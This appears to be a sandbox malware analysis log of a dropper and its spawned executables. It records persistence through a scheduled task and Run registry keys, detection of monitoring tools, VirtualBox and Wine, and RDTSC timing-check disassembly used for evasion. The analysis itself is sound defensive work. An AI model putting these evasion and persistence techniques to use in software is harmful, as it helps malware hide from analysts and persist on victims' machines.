                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: RegmonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: FilemonClass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Filemonclass
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeWindow searched: window name: Regmonclass
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7b9f3f6834.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 7b9f3f6834.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a78a39a396.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run a78a39a396.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aca7749dee.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run aca7749dee.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76dd304e1d.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 76dd304e1d.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007916001\aca7749dee.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSystem information queried: FirmwareTableInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSystem information queried: FirmwareTableInformation
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007917001\76dd304e1d.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\DocumentsCFCGIIEHIE.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: HKEY_CURRENT_USER\Software\Wine
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F278 second address: E9F295 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05C12920C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F295 second address: E9F29A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101B920 second address: 101B92F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F05C12920B6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101A89B second address: 101A89F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AA2A second address: 101AA34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AB9C second address: 101ABFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F05C1502116h 0x0000000a jno 00007F05C1502116h 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F05C1502125h 0x00000017 jnc 00007F05C1502116h 0x0000001d pop ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jng 00007F05C1502116h 0x00000027 jmp 00007F05C150211Bh 0x0000002c popad 0x0000002d jno 00007F05C150212Fh 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AD6C second address: 101AD72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AD72 second address: 101AD76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AD76 second address: 101AD94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05C12920C6h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AF78 second address: 101AF82 instructions: 0x00000000 rdtsc 0x00000002 js 00007F05C150211Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101AF82 second address: 101AF95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F05C12920BAh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E9AE second address: 101E9B8 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F05C1502116h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101E9B8 second address: 101E9BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EA0F second address: 101EA5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007F05C1502118h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 sub dword ptr [ebp+122D2575h], ebx 0x0000002b jmp 00007F05C150211Dh 0x00000030 push 5A677151h 0x00000035 jnl 00007F05C1502120h 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EA5B second address: 101EAE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 5A6771D1h 0x0000000d push 00000003h 0x0000000f sub dword ptr [ebp+122D2620h], ebx 0x00000015 push 00000000h 0x00000017 jmp 00007F05C12920C6h 0x0000001c mov edx, dword ptr [ebp+122D1FEEh] 0x00000022 push 00000003h 0x00000024 jmp 00007F05C12920BDh 0x00000029 push 77B5ECCCh 0x0000002e pushad 0x0000002f push ebx 0x00000030 pushad 0x00000031 popad 0x00000032 pop ebx 0x00000033 jp 00007F05C12920C9h 0x00000039 jmp 00007F05C12920C3h 0x0000003e popad 0x0000003f add dword ptr [esp], 484A1334h 0x00000046 mov dl, ch 0x00000048 lea ebx, dword ptr [ebp+124538FEh] 0x0000004e ja 00007F05C12920B7h 0x00000054 xchg eax, ebx 0x00000055 jbe 00007F05C12920C4h 0x0000005b push eax 0x0000005c push edx 0x0000005d jc 00007F05C12920B6h 0x00000063 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101ECBC second address: 101EDBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F05C150211Bh 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D1C03h], ecx 0x00000015 mov dword ptr [ebp+122D2524h], edi 0x0000001b push 979F53D8h 0x00000020 jmp 00007F05C1502125h 0x00000025 add dword ptr [esp], 6860ACA8h 0x0000002c mov edi, dword ptr [ebp+122D38A1h] 0x00000032 push 00000003h 0x00000034 add dword ptr [ebp+122D2DEEh], eax 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push esi 0x0000003f call 00007F05C1502118h 0x00000044 pop esi 0x00000045 mov dword ptr [esp+04h], esi 0x00000049 add dword ptr [esp+04h], 0000001Ch 0x00000051 inc esi 0x00000052 push esi 0x00000053 ret 0x00000054 pop esi 0x00000055 ret 0x00000056 sub dword ptr [ebp+122D1FEEh], eax 0x0000005c push 00000003h 0x0000005e or dword ptr [ebp+122D1BFCh], edi 0x00000064 call 00007F05C1502119h 0x00000069 pushad 0x0000006a jmp 00007F05C1502126h 0x0000006f jmp 00007F05C1502126h 0x00000074 popad 0x00000075 push eax 0x00000076 jmp 00007F05C150211Ch 0x0000007b mov eax, dword ptr [esp+04h] 0x0000007f jmp 00007F05C1502124h 0x00000084 mov eax, dword ptr [eax] 0x00000086 pushad 0x00000087 jg 00007F05C150211Ch 0x0000008d jno 00007F05C1502118h 0x00000093 popad 0x00000094 mov dword ptr [esp+04h], eax 0x00000098 push eax 0x00000099 pushad 0x0000009a push eax 0x0000009b push edx 0x0000009c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 101EDBC second address: 101EDF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop eax 0x00000008 pop eax 0x00000009 or dword ptr [ebp+122D1C10h], eax 0x0000000f lea ebx, dword ptr [ebp+12453912h] 0x00000015 and cx, 4D35h 0x0000001a push eax 0x0000001b pushad 0x0000001c pushad 0x0000001d jmp 00007F05C12920C5h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10302F4 second address: 1030306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05C150211Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EC13 second address: 103EC31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F05C12920B6h 0x0000000a jmp 00007F05C12920C0h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EC31 second address: 103EC36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103EC36 second address: 103EC3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CB8F second address: 103CB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CB97 second address: 103CB9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CB9D second address: 103CBB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F05C1502116h 0x0000000a jmp 00007F05C150211Eh 0x0000000f popad 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CBB6 second address: 103CBD5 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F05C12920CAh 0x00000008 jmp 00007F05C12920C4h 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CF8D second address: 103CF93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103CF93 second address: 103CFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F05C12920C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D633 second address: 103D637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D637 second address: 103D643 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D643 second address: 103D649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D649 second address: 103D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D64D second address: 103D651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D651 second address: 103D677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F05C12920BEh 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jo 00007F05C12920E4h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b push eax 0x0000001c pop eax 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D987 second address: 103D98C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103D98C second address: 103D9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F05C12920C4h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC3C second address: 103DC40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC40 second address: 103DC4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC4C second address: 103DC52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC52 second address: 103DC56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 103DC56 second address: 103DC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
